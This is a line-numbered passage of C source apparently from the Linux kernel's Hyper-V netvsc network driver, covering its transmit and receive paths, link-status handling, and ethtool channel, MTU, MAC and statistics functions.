| len, &pb[slots_used]); 635 | 636 | packet->rmsg_size = len; 637 | packet->rmsg_pgcnt = slots_used; 638 | 639 | slots_used += fill_pg_buf(virt_to_page(data), 640 | offset_in_page(data), 641 | skb_headlen(skb), &pb[slots_used]); 642 | 643 | for (i = 0; i < frags; i++) { 644 | skb_frag_t *frag = skb_shinfo(skb)->frags + i; 645 | 646 | slots_used += fill_pg_buf(skb_frag_page(frag), 647 | frag->page_offset, 648 | skb_frag_size(frag), &pb[slots_used]); 649 | } 650 | return slots_used; 651 | } 652 | 653 | static int count_skb_frag_slots(struct sk_buff *skb) 654 | { 655 | int i, frags = skb_shinfo(skb)->nr_frags; 656 | int pages = 0; 657 | 658 | for (i = 0; i < frags; i++) { 659 | skb_frag_t *frag = skb_shinfo(skb)->frags + i; 660 | unsigned long size = skb_frag_size(frag); 661 | unsigned long offset = frag->page_offset; 662 | 663 | /* Skip unused frames from start of page */ 664 | offset &= ~PAGE_MASK; 665 | pages += PFN_UP(offset + size); 666 | } 667 | return pages; 668 | } 669 | 670 | static int netvsc_get_slots(struct sk_buff *skb) 671 | { 672 | char *data = skb->data; 673 | unsigned int offset = offset_in_page(data); 674 | unsigned int len = skb_headlen(skb); 675 | int slots; 676 | int frag_slots; 677 | 678 | slots = DIV_ROUND_UP(offset + len, PAGE_SIZE); 679 | frag_slots = count_skb_frag_slots(skb); 680 | return slots + frag_slots; 681 | } 682 | 683 | static u32 net_checksum_info(struct sk_buff *skb) 684 | { 685 | if (skb->protocol == htons(ETH_P_IP)) { 686 | struct iphdr *ip = ip_hdr(skb); 687 | 688 | if (ip->protocol == IPPROTO_TCP) 689 | return TRANSPORT_INFO_IPV4_TCP; 690 | else if (ip->protocol == IPPROTO_UDP) 691 | return TRANSPORT_INFO_IPV4_UDP; 692 | } else { 693 | struct ipv6hdr *ip6 = ipv6_hdr(skb); 694 | 695 | if (ip6->nexthdr == IPPROTO_TCP) 696 | return TRANSPORT_INFO_IPV6_TCP; 697 | else if (ip6->nexthdr == IPPROTO_UDP) 698 | return TRANSPORT_INFO_IPV6_UDP; 699 | } 700 | 701 | return TRANSPORT_INFO_NOT_IP; 702 | } 703 | 704 | /* Send skb on the slave VF device. */ 705 | static int netvsc_vf_xmit(struct net_device *net, struct net_device *vf_netdev, 706 | struct sk_buff *skb) 707 | { 708 | struct net_device_context *ndev_ctx = netdev_priv(net); 709 | unsigned int len = skb->len; 710 | int rc; 711 | 712 | skb->dev = vf_netdev; 713 | skb->queue_mapping = qdisc_skb_cb(skb)->slave_dev_queue_mapping; 714 | 715 | rc = dev_queue_xmit(skb); 716 | if (likely(rc == NET_XMIT_SUCCESS || rc == NET_XMIT_CN)) { 717 | struct netvsc_vf_pcpu_stats *pcpu_stats 718 | = this_cpu_ptr(ndev_ctx->vf_stats); 719 | 720 | u64_stats_update_begin(&pcpu_stats->syncp); 721 | pcpu_stats->tx_packets++; 722 | pcpu_stats->tx_bytes += len; 723 | u64_stats_update_end(&pcpu_stats->syncp); 724 | } else { 725 | this_cpu_inc(ndev_ctx->vf_stats->tx_dropped); 726 | } 727 | 728 | return rc; 729 | } 730 | 731 | static int netvsc_start_xmit(struct sk_buff *skb, struct net_device *net) 732 | { 733 | struct net_device_context *net_device_ctx = netdev_priv(net); 734 | struct hv_netvsc_packet *packet = NULL; 735 | int ret; 736 | unsigned int num_data_pgs; 737 | struct rndis_message *rndis_msg; 738 | struct rndis_packet *rndis_pkt; 739 | struct net_device *vf_netdev; 740 | u32 rndis_msg_size; 741 | struct rndis_per_packet_info *ppi; 742 | u32 hash; 743 | struct hv_page_buffer pb[MAX_PAGE_BUFFER_COUNT]; 744 | 745 | /* if VF is present and up then redirect packets 746 | * already called with rcu_read_lock_bh 747 | */ 748 | vf_netdev = rcu_dereference_bh(net_device_ctx->vf_netdev); 749 | if (vf_netdev && netif_running(vf_netdev) && 750 | !netpoll_tx_running(net)) 751 | return netvsc_vf_xmit(net, vf_netdev, skb); 752 | 753 | /* We will atmost need two pages to describe the rndis 754 | * header. We can only transmit MAX_PAGE_BUFFER_COUNT number 755 | * of pages in a single packet. If skb is scattered around 756 | * more pages we try linearizing it. 757 | */ 758 | 759 | num_data_pgs = netvsc_get_slots(skb) + 2; 760 | 761 | if (unlikely(num_data_pgs > MAX_PAGE_BUFFER_COUNT)) { 762 | ++net_device_ctx->eth_stats.tx_scattered; 763 | 764 | if (skb_linearize(skb)) 765 | goto no_memory; 766 | 767 | num_data_pgs = netvsc_get_slots(skb) + 2; 768 | if (num_data_pgs > MAX_PAGE_BUFFER_COUNT) { 769 | ++net_device_ctx->eth_stats.tx_too_big; 770 | goto drop; 771 | } 772 | } 773 | 774 | /* 775 | * Place the rndis header in the skb head room and 776 | * the skb->cb will be used for hv_netvsc_packet 777 | * structure. 778 | */ 779 | ret = skb_cow_head(skb, RNDIS_AND_PPI_SIZE); 780 | if (ret) 781 | goto no_memory; 782 | 783 | /* Use the skb control buffer for building up the packet */ 784 | BUILD_BUG_ON(sizeof(struct hv_netvsc_packet) > 785 | FIELD_SIZEOF(struct sk_buff, cb)); 786 | packet = (struct hv_netvsc_packet *)skb->cb; 787 | 788 | packet->q_idx = skb_get_queue_mapping(skb); 789 | 790 | packet->total_data_buflen = skb->len; 791 | packet->total_bytes = skb->len; 792 | packet->total_packets = 1; 793 | 794 | rndis_msg = (struct rndis_message *)skb->head; 795 | 796 | memset(rndis_msg, 0, RNDIS_AND_PPI_SIZE); 797 | 798 | /* Add the rndis header */ 799 | rndis_msg->ndis_msg_type = RNDIS_MSG_PACKET; 800 | rndis_msg->msg_len = packet->total_data_buflen; 801 | rndis_pkt = &rndis_msg->msg.pkt; 802 | rndis_pkt->data_offset = sizeof(struct rndis_packet); 803 | rndis_pkt->data_len = packet->total_data_buflen; 804 | rndis_pkt->per_pkt_info_offset = sizeof(struct rndis_packet); 805 | 806 | rndis_msg_size = RNDIS_MESSAGE_SIZE(struct rndis_packet); 807 | 808 | hash = skb_get_hash_raw(skb); 809 | if (hash != 0 && net->real_num_tx_queues > 1) { 810 | rndis_msg_size += NDIS_HASH_PPI_SIZE; 811 | ppi = init_ppi_data(rndis_msg, NDIS_HASH_PPI_SIZE, 812 | NBL_HASH_VALUE); 813 | *(u32 *)((void *)ppi + ppi->ppi_offset) = hash; 814 | } 815 | 816 | if (skb_vlan_tag_present(skb)) { 817 | struct ndis_pkt_8021q_info *vlan; 818 | 819 | rndis_msg_size += NDIS_VLAN_PPI_SIZE; 820 | ppi = init_ppi_data(rndis_msg, NDIS_VLAN_PPI_SIZE, 821 | IEEE_8021Q_INFO); 822 | 823 | vlan = (void *)ppi + ppi->ppi_offset; 824 | vlan->vlanid = skb->vlan_tci & VLAN_VID_MASK; 825 | vlan->pri = (skb->vlan_tci & VLAN_PRIO_MASK) >> 826 | VLAN_PRIO_SHIFT; 827 | } 828 | 829 | if (skb_is_gso(skb)) { 830 | struct ndis_tcp_lso_info *lso_info; 831 | 832 | rndis_msg_size += NDIS_LSO_PPI_SIZE; 833 | ppi = init_ppi_data(rndis_msg, NDIS_LSO_PPI_SIZE, 834 | TCP_LARGESEND_PKTINFO); 835 | 836 | lso_info = (void *)ppi + ppi->ppi_offset; 837 | 838 | lso_info->lso_v2_transmit.type = NDIS_TCP_LARGE_SEND_OFFLOAD_V2_TYPE; 839 | if (skb->protocol == htons(ETH_P_IP)) { 840 | lso_info->lso_v2_transmit.ip_version = 841 | NDIS_TCP_LARGE_SEND_OFFLOAD_IPV4; 842 | ip_hdr(skb)->tot_len = 0; 843 | ip_hdr(skb)->check = 0; 844 | tcp_hdr(skb)->check = 845 | ~csum_tcpudp_magic(ip_hdr(skb)->saddr, 846 | ip_hdr(skb)->daddr, 0, IPPROTO_TCP, 0); 847 | } else { 848 | lso_info->lso_v2_transmit.ip_version = 849 | NDIS_TCP_LARGE_SEND_OFFLOAD_IPV6; 850 | ipv6_hdr(skb)->payload_len = 0; 851 | tcp_hdr(skb)->check = 852 | ~csum_ipv6_magic(&ipv6_hdr(skb)->saddr, 853 | &ipv6_hdr(skb)->daddr, 0, IPPROTO_TCP, 0); 854 | } 855 | lso_info->lso_v2_transmit.tcp_header_offset = skb_transport_offset(skb); 856 | lso_info->lso_v2_transmit.mss = skb_shinfo(skb)->gso_size; 857 | } else if (skb->ip_summed == CHECKSUM_PARTIAL) { 858 | if (net_checksum_info(skb) & net_device_ctx->tx_checksum_mask) { 859 | struct ndis_tcp_ip_checksum_info *csum_info; 860 | 861 | rndis_msg_size += NDIS_CSUM_PPI_SIZE; 862 | ppi = init_ppi_data(rndis_msg, NDIS_CSUM_PPI_SIZE, 863 | TCPIP_CHKSUM_PKTINFO); 864 | 865 | csum_info = (struct ndis_tcp_ip_checksum_info *)((void *)ppi + 866 | ppi->ppi_offset); 867 | 868 | csum_info->transmit.tcp_header_offset = skb_transport_offset(skb); 869 | 870 | if (skb->protocol == htons(ETH_P_IP)) { 871 | csum_info->transmit.is_ipv4 = 1; 872 | 873 | if (ip_hdr(skb)->protocol == IPPROTO_TCP) 874 | csum_info->transmit.tcp_checksum = 1; 875 | else 876 | csum_info->transmit.udp_checksum = 1; 877 | } else { 878 | csum_info->transmit.is_ipv6 = 1; 879 | 880 | if (ipv6_hdr(skb)->nexthdr == IPPROTO_TCP) 881 | csum_info->transmit.tcp_checksum = 1; 882 | else 883 | csum_info->transmit.udp_checksum = 1; 884 | } 885 | } else { 886 | /* Can't do offload of this type of checksum */ 887 | if (skb_checksum_help(skb)) 888 | goto drop; 889 | } 890 | } 891 | 892 | /* Start filling in the page buffers with the rndis hdr */ 893 | rndis_msg->msg_len += rndis_msg_size; 894 | packet->total_data_buflen = rndis_msg->msg_len; 895 | packet->page_buf_cnt = init_page_array(rndis_msg, rndis_msg_size, 896 | skb, packet, pb); 897 | 898 | /* timestamp packet in software */ 899 | skb_tx_timestamp(skb); 900 | 901 | ret = netvsc_send(net_device_ctx, packet, rndis_msg, pb, skb); 902 | if (likely(ret == 0)) 903 | return NETDEV_TX_OK; 904 | 905 | if (ret == -EAGAIN) { 906 | ++net_device_ctx->eth_stats.tx_busy; 907 | return NETDEV_TX_BUSY; 908 | } 909 | 910 | if (ret == -ENOSPC) 911 | ++net_device_ctx->eth_stats.tx_no_space; 912 | 913 | drop: 914 | dev_kfree_skb_any(skb); 915 | net->stats.tx_dropped++; 916 | 917 | return NETDEV_TX_OK; 918 | 919 | no_memory: 920 | ++net_device_ctx->eth_stats.tx_no_memory; 921 | goto drop; 922 | } 923 | 924 | /* 925 | * netvsc_linkstatus_callback - Link up/down notification 926 | */ 927 | void netvsc_linkstatus_callback(struct hv_device *device_obj, 928 | struct rndis_message *resp) 929 | { 930 | struct rndis_indicate_status *indicate = &resp->msg.indicate_status; 931 | struct net_device *net; 932 | struct net_device_context *ndev_ctx; 933 | struct netvsc_reconfig *event; 934 | unsigned long flags; 935 | 936 | net = hv_get_drvdata(device_obj); 937 | 938 | if (!net) 939 | return; 940 | 941 | ndev_ctx = netdev_priv(net); 942 | 943 | /* Update the physical link speed when changing to another vSwitch */ 944 | if (indicate->status == RNDIS_STATUS_LINK_SPEED_CHANGE) { 945 | u32 speed; 946 | 947 | speed = *(u32 *)((void *)indicate 948 | + indicate->status_buf_offset) / 10000; 949 | ndev_ctx->speed = speed; 950 | return; 951 | } 952 | 953 | /* Handle these link change statuses below */ 954 | if (indicate->status != RNDIS_STATUS_NETWORK_CHANGE && 955 | indicate->status != RNDIS_STATUS_MEDIA_CONNECT && 956 | indicate->status != RNDIS_STATUS_MEDIA_DISCONNECT) 957 | return; 958 | 959 | if (net->reg_state != NETREG_REGISTERED) 960 | return; 961 | 962 | event = kzalloc(sizeof(*event), GFP_ATOMIC); 963 | if (!event) 964 | return; 965 | event->event = indicate->status; 966 | 967 | spin_lock_irqsave(&ndev_ctx->lock, flags); 968 | list_add_tail(&event->list, &ndev_ctx->reconfig_events); 969 | spin_unlock_irqrestore(&ndev_ctx->lock, flags); 970 | 971 | schedule_delayed_work(&ndev_ctx->dwork, 0); 972 | } 973 | 974 | static struct sk_buff *netvsc_alloc_recv_skb(struct net_device *net, 975 | struct napi_struct *napi, 976 | const struct ndis_tcp_ip_checksum_info *csum_info, 977 | const struct ndis_pkt_8021q_info *vlan, 978 | void *data, u32 buflen) 979 | { 980 | struct sk_buff *skb; 981 | 982 | skb = napi_alloc_skb(napi, buflen); 983 | if (!skb) 984 | return skb; 985 | 986 | /* 987 | * Copy to skb. This copy is needed here since the memory pointed by 988 | * hv_netvsc_packet cannot be deallocated 989 | */ 990 | skb_put_data(skb, data, buflen); 991 | 992 | skb->protocol = eth_type_trans(skb, net); 993 | 994 | /* skb is already created with CHECKSUM_NONE */ 995 | skb_checksum_none_assert(skb); 996 | 997 | /* 998 | * In Linux, the IP checksum is always checked. 999 | * Do L4 checksum offload if enabled and present. 1000 | */ 1001 | if (csum_info && (net->features & NETIF_F_RXCSUM)) { 1002 | if (csum_info->receive.tcp_checksum_succeeded || 1003 | csum_info->receive.udp_checksum_succeeded) 1004 | skb->ip_summed = CHECKSUM_UNNECESSARY; 1005 | } 1006 | 1007 | if (vlan) { 1008 | u16 vlan_tci = vlan->vlanid | (vlan->pri << VLAN_PRIO_SHIFT); 1009 | 1010 | __vlan_hwaccel_put_tag(skb, htons(ETH_P_8021Q), 1011 | vlan_tci); 1012 | } 1013 | 1014 | return skb; 1015 | } 1016 | 1017 | /* 1018 | * netvsc_recv_callback - Callback when we receive a packet from the 1019 | * "wire" on the specified device. 1020 | */ 1021 | int netvsc_recv_callback(struct net_device *net, 1022 | struct vmbus_channel *channel, 1023 | void *data, u32 len, 1024 | const struct ndis_tcp_ip_checksum_info *csum_info, 1025 | const struct ndis_pkt_8021q_info *vlan) 1026 | { 1027 | struct net_device_context *net_device_ctx = netdev_priv(net); 1028 | struct netvsc_device *net_device; 1029 | u16 q_idx = channel->offermsg.offer.sub_channel_index; 1030 | struct netvsc_channel *nvchan; 1031 | struct sk_buff *skb; 1032 | struct netvsc_stats *rx_stats; 1033 | 1034 | if (net->reg_state != NETREG_REGISTERED) 1035 | return NVSP_STAT_FAIL; 1036 | 1037 | rcu_read_lock(); 1038 | net_device = rcu_dereference(net_device_ctx->nvdev); 1039 | if (unlikely(!net_device)) 1040 | goto drop; 1041 | 1042 | nvchan = &net_device->chan_table[q_idx]; 1043 | 1044 | /* Allocate a skb - TODO direct I/O to pages? */ 1045 | skb = netvsc_alloc_recv_skb(net, &nvchan->napi, 1046 | csum_info, vlan, data, len); 1047 | if (unlikely(!skb)) { 1048 | drop: 1049 | ++net->stats.rx_dropped; 1050 | rcu_read_unlock(); 1051 | return NVSP_STAT_FAIL; 1052 | } 1053 | 1054 | skb_record_rx_queue(skb, q_idx); 1055 | 1056 | /* 1057 | * Even if injecting the packet, record the statistics 1058 | * on the synthetic device because modifying the VF device 1059 | * statistics will not work correctly. 1060 | */ 1061 | rx_stats = &nvchan->rx_stats; 1062 | u64_stats_update_begin(&rx_stats->syncp); 1063 | rx_stats->packets++; 1064 | rx_stats->bytes += len; 1065 | 1066 | if (skb->pkt_type == PACKET_BROADCAST) 1067 | ++rx_stats->broadcast; 1068 | else if (skb->pkt_type == PACKET_MULTICAST) 1069 | ++rx_stats->multicast; 1070 | u64_stats_update_end(&rx_stats->syncp); 1071 | 1072 | napi_gro_receive(&nvchan->napi, skb); 1073 | rcu_read_unlock(); 1074 | 1075 | return 0; 1076 | } 1077 | 1078 | static void netvsc_get_drvinfo(struct net_device *net, 1079 | struct ethtool_drvinfo *info) 1080 | { 1081 | strlcpy(info->driver, KBUILD_MODNAME, sizeof(info->driver)); 1082 | strlcpy(info->fw_version, "N/A", sizeof(info->fw_version)); 1083 | } 1084 | 1085 | static void netvsc_get_channels(struct net_device *net, 1086 | struct ethtool_channels *channel) 1087 | { 1088 | struct net_device_context *net_device_ctx = netdev_priv(net); 1089 | struct netvsc_device *nvdev = rtnl_dereference(net_device_ctx->nvdev); 1090 | 1091 | if (nvdev) { 1092 | channel->max_combined = nvdev->max_chn; 1093 | channel->combined_count = nvdev->num_chn; 1094 | } 1095 | } 1096 | 1097 | static int netvsc_set_channels(struct net_device *net, 1098 | struct ethtool_channels *channels) 1099 | { 1100 | struct net_device_context *net_device_ctx = netdev_priv(net); 1101 | struct hv_device *dev = net_device_ctx->device_ctx; 1102 | struct netvsc_device *nvdev = rtnl_dereference(net_device_ctx->nvdev); 1103 | unsigned int orig, count = channels->combined_count; 1104 | struct netvsc_device_info device_info; 1105 | bool was_opened; 1106 | int ret = 0; 1107 | 1108 | /* We do not support separate count for rx, tx, or other */ 1109 | if (count == 0 || 1110 | channels->rx_count || channels->tx_count || channels->other_count) 1111 | return -EINVAL; 1112 | 1113 | if (!nvdev || nvdev->destroy) 1114 | return -ENODEV; 1115 | 1116 | if (nvdev->nvsp_version < NVSP_PROTOCOL_VERSION_5) 1117 | return -EINVAL; 1118 | 1119 | if (count > nvdev->max_chn) 1120 | return -EINVAL; 1121 | 1122 | orig = nvdev->num_chn; 1123 | was_opened = rndis_filter_opened(nvdev); 1124 | if (was_opened) 1125 | rndis_filter_close(nvdev); 1126 | 1127 | memset(&device_info, 0, sizeof(device_info)); 1128 | device_info.num_chn = count; 1129 | device_info.ring_size = ring_size; 1130 | device_info.send_sections = nvdev->send_section_cnt; 1131 | device_info.send_section_size = nvdev->send_section_size; 1132 | device_info.recv_sections = nvdev->recv_section_cnt; 1133 | device_info.recv_section_size = nvdev->recv_section_size; 1134 | 1135 | rndis_filter_device_remove(dev, nvdev); 1136 | 1137 | nvdev = rndis_filter_device_add(dev, &device_info); 1138 | if (IS_ERR(nvdev)) { 1139 | ret = PTR_ERR(nvdev); 1140 | device_info.num_chn = orig; 1141 | nvdev = rndis_filter_device_add(dev, &device_info); 1142 | 1143 | if (IS_ERR(nvdev)) { 1144 | netdev_err(net, "restoring channel setting failed: %ld\n", 1145 | PTR_ERR(nvdev)); 1146 | return ret; 1147 | } 1148 | } 1149 | 1150 | if (was_opened) 1151 | rndis_filter_open(nvdev); 1152 | 1153 | /* We may have missed link change notifications */ 1154 | net_device_ctx->last_reconfig = 0; 1155 | schedule_delayed_work(&net_device_ctx->dwork, 0); 1156 | 1157 | return ret; 1158 | } 1159 | 1160 | static bool 1161 | netvsc_validate_ethtool_ss_cmd(const struct ethtool_link_ksettings *cmd) 1162 | { 1163 | struct ethtool_link_ksettings diff1 = *cmd; 1164 | struct ethtool_link_ksettings diff2 = {}; 1165 | 1166 | diff1.base.speed = 0; 1167 | diff1.base.duplex = 0; 1168 | /* advertising and cmd are usually set */ 1169 | ethtool_link_ksettings_zero_link_mode(&diff1, advertising); 1170 | diff1.base.cmd = 0; 1171 | /* We set port to PORT_OTHER */ 1172 | diff2.base.port = PORT_OTHER; 1173 | 1174 | return !memcmp(&diff1, &diff2, sizeof(diff1)); 1175 | } 1176 | 1177 | static void netvsc_init_settings(struct net_device *dev) 1178 | { 1179 | struct net_device_context *ndc = netdev_priv(dev); 1180 | 1181 | ndc->udp4_l4_hash = true; 1182 | ndc->udp6_l4_hash = true; 1183 | 1184 | ndc->speed = SPEED_UNKNOWN; 1185 | ndc->duplex = DUPLEX_FULL; 1186 | } 1187 | 1188 | static int netvsc_get_link_ksettings(struct net_device *dev, 1189 | struct ethtool_link_ksettings *cmd) 1190 | { 1191 | struct net_device_context *ndc = netdev_priv(dev); 1192 | 1193 | cmd->base.speed = ndc->speed; 1194 | cmd->base.duplex = ndc->duplex; 1195 | cmd->base.port = PORT_OTHER; 1196 | 1197 | return 0; 1198 | } 1199 | 1200 | static int netvsc_set_link_ksettings(struct net_device *dev, 1201 | const struct ethtool_link_ksettings *cmd) 1202 | { 1203 | struct net_device_context *ndc = netdev_priv(dev); 1204 | u32 speed; 1205 | 1206 | speed = cmd->base.speed; 1207 | if (!ethtool_validate_speed(speed) || 1208 | !ethtool_validate_duplex(cmd->base.duplex) || 1209 | !netvsc_validate_ethtool_ss_cmd(cmd)) 1210 | return -EINVAL; 1211 | 1212 | ndc->speed = speed; 1213 | ndc->duplex = cmd->base.duplex; 1214 | 1215 | return 0; 1216 | } 1217 | 1218 | static int netvsc_change_mtu(struct net_device *ndev, int mtu) 1219 | { 1220 | struct net_device_context *ndevctx = netdev_priv(ndev); 1221 | struct net_device *vf_netdev = rtnl_dereference(ndevctx->vf_netdev); 1222 | struct netvsc_device *nvdev = rtnl_dereference(ndevctx->nvdev); 1223 | struct hv_device *hdev = ndevctx->device_ctx; 1224 | int orig_mtu = ndev->mtu; 1225 | struct netvsc_device_info device_info; 1226 | bool was_opened; 1227 | int ret = 0; 1228 | 1229 | if (!nvdev || nvdev->destroy) 1230 | return -ENODEV; 1231 | 1232 | /* Change MTU of underlying VF netdev first. */ 1233 | if (vf_netdev) { 1234 | ret = dev_set_mtu(vf_netdev, mtu); 1235 | if (ret) 1236 | return ret; 1237 | } 1238 | 1239 | netif_device_detach(ndev); 1240 | was_opened = rndis_filter_opened(nvdev); 1241 | if (was_opened) 1242 | rndis_filter_close(nvdev); 1243 | 1244 | memset(&device_info, 0, sizeof(device_info)); 1245 | device_info.ring_size = ring_size; 1246 | device_info.num_chn = nvdev->num_chn; 1247 | device_info.send_sections = nvdev->send_section_cnt; 1248 | device_info.send_section_size = nvdev->send_section_size; 1249 | device_info.recv_sections = nvdev->recv_section_cnt; 1250 | device_info.recv_section_size = nvdev->recv_section_size; 1251 | 1252 | rndis_filter_device_remove(hdev, nvdev); 1253 | 1254 | ndev->mtu = mtu; 1255 | 1256 | nvdev = rndis_filter_device_add(hdev, &device_info); 1257 | if (IS_ERR(nvdev)) { 1258 | ret = PTR_ERR(nvdev); 1259 | 1260 | /* Attempt rollback to original MTU */ 1261 | ndev->mtu = orig_mtu; 1262 | nvdev = rndis_filter_device_add(hdev, &device_info); 1263 | 1264 | if (vf_netdev) 1265 | dev_set_mtu(vf_netdev, orig_mtu); 1266 | 1267 | if (IS_ERR(nvdev)) { 1268 | netdev_err(ndev, "restoring mtu failed: %ld\n", 1269 | PTR_ERR(nvdev)); 1270 | return ret; 1271 | } 1272 | } 1273 | 1274 | if (was_opened) 1275 | rndis_filter_open(nvdev); 1276 | 1277 | netif_device_attach(ndev); 1278 | 1279 | /* We may have missed link change notifications */ 1280 | schedule_delayed_work(&ndevctx->dwork, 0); 1281 | 1282 | return ret; 1283 | } 1284 | 1285 | static void netvsc_get_vf_stats(struct net_device *net, 1286 | struct netvsc_vf_pcpu_stats *tot) 1287 | { 1288 | struct net_device_context *ndev_ctx = netdev_priv(net); 1289 | int i; 1290 | 1291 | memset(tot, 0, sizeof(*tot)); 1292 | 1293 | for_each_possible_cpu(i) { 1294 | const struct netvsc_vf_pcpu_stats *stats 1295 | = per_cpu_ptr(ndev_ctx->vf_stats, i); 1296 | u64 rx_packets, rx_bytes, tx_packets, tx_bytes; 1297 | unsigned int start; 1298 | 1299 | do { 1300 | start = u64_stats_fetch_begin_irq(&stats->syncp); 1301 | rx_packets = stats->rx_packets; 1302 | tx_packets = stats->tx_packets; 1303 | rx_bytes = stats->rx_bytes; 1304 | tx_bytes = stats->tx_bytes; 1305 | } while (u64_stats_fetch_retry_irq(&stats->syncp, start)); 1306 | 1307 | tot->rx_packets += rx_packets; 1308 | tot->tx_packets += tx_packets; 1309 | tot->rx_bytes += rx_bytes; 1310 | tot->tx_bytes += tx_bytes; 1311 | tot->tx_dropped += stats->tx_dropped; 1312 | } 1313 | } 1314 | 1315 | static void netvsc_get_stats64(struct net_device *net, 1316 | struct rtnl_link_stats64 *t) 1317 | { 1318 | struct net_device_context *ndev_ctx = netdev_priv(net); 1319 | struct netvsc_device *nvdev = rcu_dereference_rtnl(ndev_ctx->nvdev); 1320 | struct netvsc_vf_pcpu_stats vf_tot; 1321 | int i; 1322 | 1323 | if (!nvdev) 1324 | return; 1325 | 1326 | netdev_stats_to_stats64(t, &net->stats); 1327 | 1328 | netvsc_get_vf_stats(net, &vf_tot); 1329 | t->rx_packets += vf_tot.rx_packets; 1330 | t->tx_packets += vf_tot.tx_packets; 1331 | t->rx_bytes += vf_tot.rx_bytes; 1332 | t->tx_bytes += vf_tot.tx_bytes; 1333 | t->tx_dropped += vf_tot.tx_dropped; 1334 | 1335 | for (i = 0; i < nvdev->num_chn; i++) { 1336 | const struct netvsc_channel *nvchan = &nvdev->chan_table[i]; 1337 | const struct netvsc_stats *stats; 1338 | u64 packets, bytes, multicast; 1339 | unsigned int start; 1340 | 1341 | stats = &nvchan->tx_stats; 1342 | do { 1343 | start = u64_stats_fetch_begin_irq(&stats->syncp); 1344 | packets = stats->packets; 1345 | bytes = stats->bytes; 1346 | } while (u64_stats_fetch_retry_irq(&stats->syncp, start)); 1347 | 1348 | t->tx_bytes += bytes; 1349 | t->tx_packets += packets; 1350 | 1351 | stats = &nvchan->rx_stats; 1352 | do { 1353 | start = u64_stats_fetch_begin_irq(&stats->syncp); 1354 | packets = stats->packets; 1355 | bytes = stats->bytes; 1356 | multicast = stats->multicast + stats->broadcast; 1357 | } while (u64_stats_fetch_retry_irq(&stats->syncp, start)); 1358 | 1359 | t->rx_bytes += bytes; 1360 | t->rx_packets += packets; 1361 | t->multicast += multicast; 1362 | } 1363 | } 1364 | 1365 | static int netvsc_set_mac_addr(struct net_device *ndev, void *p) 1366 | { 1367 | struct net_device_context *ndc = netdev_priv(ndev); 1368 | struct net_device *vf_netdev = rtnl_dereference(ndc->vf_netdev); 1369 | struct netvsc_device *nvdev = rtnl_dereference(ndc->nvdev); 1370 | struct sockaddr *addr = p; 1371 | int err; 1372 | 1373 | err = eth_prepare_mac_addr_change(ndev, p); 1374 | if (err) 1375 | return err; 1376 | 1377 | if (!nvdev) 1378 | return -ENODEV; 1379 | 1380 | if (vf_netdev) { 1381 | err = dev_set_mac_address(vf_netdev, addr); 1382 | if (err) 1383 | return err; 1384 | } 1385 | 1386 | err = rndis_filter_set_device_mac(nvdev, addr->sa_data); 1387 | if (!err) { 1388 | eth_commit_mac_addr_change(ndev, p); 1389 | } else if (vf_netdev) { 1390 | /* rollback change on VF */ 1391 | memcpy(addr->sa_data, ndev->dev_addr, ETH_ALEN); 1392 | dev_set_mac_address(vf_netdev, addr); 1393 | } 1394 | 1395 | return err; 1396 | } 1397 | 1398 | static const struct { 1399 | char name[ETH_GSTRING_LEN]; 1400 | u16 offset; 1401 | } netvsc_stats[] = { 1402 | { "tx_scattered", offsetof(struct netvsc_ethtool_stats, tx_scattered) }, 1403 | { "tx_no_memory", offsetof(struct netvsc_ethtool_stats, tx_no_memory) }, 1404 | { "tx_no_space", offsetof(struct netvsc_ethtool_stats, tx_no_space) }, 1405 | { "tx_too_big", offsetof(struct netvsc_ethtool_stats, tx_too_big) }, 1406 | { "tx_busy", offsetof(struct netvsc_ethtool_stats, tx_busy) }, 1407 | { "tx_send_full", offsetof(struct netvsc_ethtool_stats, tx_send_full) }, 1408 | { "rx_comp_busy", offsetof(struct netvsc_ethtool_stats, rx_comp_busy) }, 1409 | }, vf_stats[] = { 1410 | { "vf_rx_packets", offsetof(struct netvsc_vf_pcpu_stats, rx_packets) }, 1411 | { "vf_rx_bytes", offsetof(struct netvsc_vf_pcpu_stats, rx_bytes) }, 1412 | { "vf_tx_packets", offsetof(struct netvsc_vf_pcpu_stats, tx_packets) }, 1413 | { "vf_tx_bytes", offsetof(struct netvsc_vf_pcpu_stats, tx_bytes) }, 1414 | { "vf_tx_dropped", offsetof(struct netvsc_vf_pcpu_stats, tx_dropped) }, 1415 | }; 1416 | 1417 | #define NETVSC_GLOBAL_STATS_LEN ARRAY_SIZE(netvsc_stats) 1418 | #define NETVSC_VF_STATS_LEN ARRAY_SIZE(vf_stats) 1419 | 1420 | /* 4 statistics per queue (rx/tx packets/bytes) */ 1421 | #define NETVSC_QUEUE_STATS_LEN(dev) ((dev)->num_chn * 4) 1422 | 1423 | static int netvsc_get_sset_count(struct net_device *dev, int string_set) 1424 | { 1425 | struct net_device_context *ndc = netdev_priv(dev); 1426 | struct netvsc_device *nvdev = rtnl_dereference(ndc->nvdev); 1427 | 1428 | if (!nvdev) 1429 | return -ENODEV; 1430 | 1431 | switch (string_set) { 1432 | case ETH_SS_STATS: 1433 | return NETVSC_GLOBAL_STATS_LEN 1434 | + NETVSC_VF_STATS_LEN 1435 | + NETVSC_QUEUE_STATS_LEN(nvdev); 1436 | default: 1437 | return -EINVAL; 1438 | } 1439 | } 1440 | 1441 | static void netvsc_get_ethtool_stats(struct net_device *dev, 1442 | struct ethtool_stats *stats, u64 *data) 1443 | { 1444 | struct net_device_context *ndc = netdev_priv(dev); 1445 | struct netvsc_device *nvdev = rtnl_dereference(ndc->nvdev); 1446 | const void *nds = &ndc->eth_stats; 1447 | const struct netvsc_stats *qstats; 1448 | struct netvsc_vf_pcpu_stats sum; 1449 | unsigned int start; 1450 | u64 packets, bytes; 1451 | int i, j; 1452 | 1453 | if (!nvdev) 1454 | return; 1455 | 1456 | for (i = 0; i < NETVSC_GLOBAL_STATS_LEN; i++) 1457 | data[i] = *(unsigned long *)(nds + netvsc_stats[i].offset); 1458 | 1459 | netvsc_get_vf_stats(dev, &sum); 1460 | for (j = 0; j < NETVSC_VF_STATS_LEN; j++) 1461 | data[i++] = *(u64 *)((void *)&sum + vf_stats[j].offset); 1462 | 1463 | for (j = 0; j < nvdev->num_chn; j++) { 1464 | qstats = &nvdev->chan_table[j].tx_stats; 1465 | 1466 | do { 1467 | start = u64_stats_fetch_begin_irq(&qstats->syncp); 1468 | packets = qstats->packets; 1469 | bytes = qstats->bytes; 1470 | } while (u64_stats_fetch_retry_irq(&qstats->syncp, start)); 1471 | data[i++] = packets; 1472 | data[i++] = bytes; 1473 | 1474 | qstats = 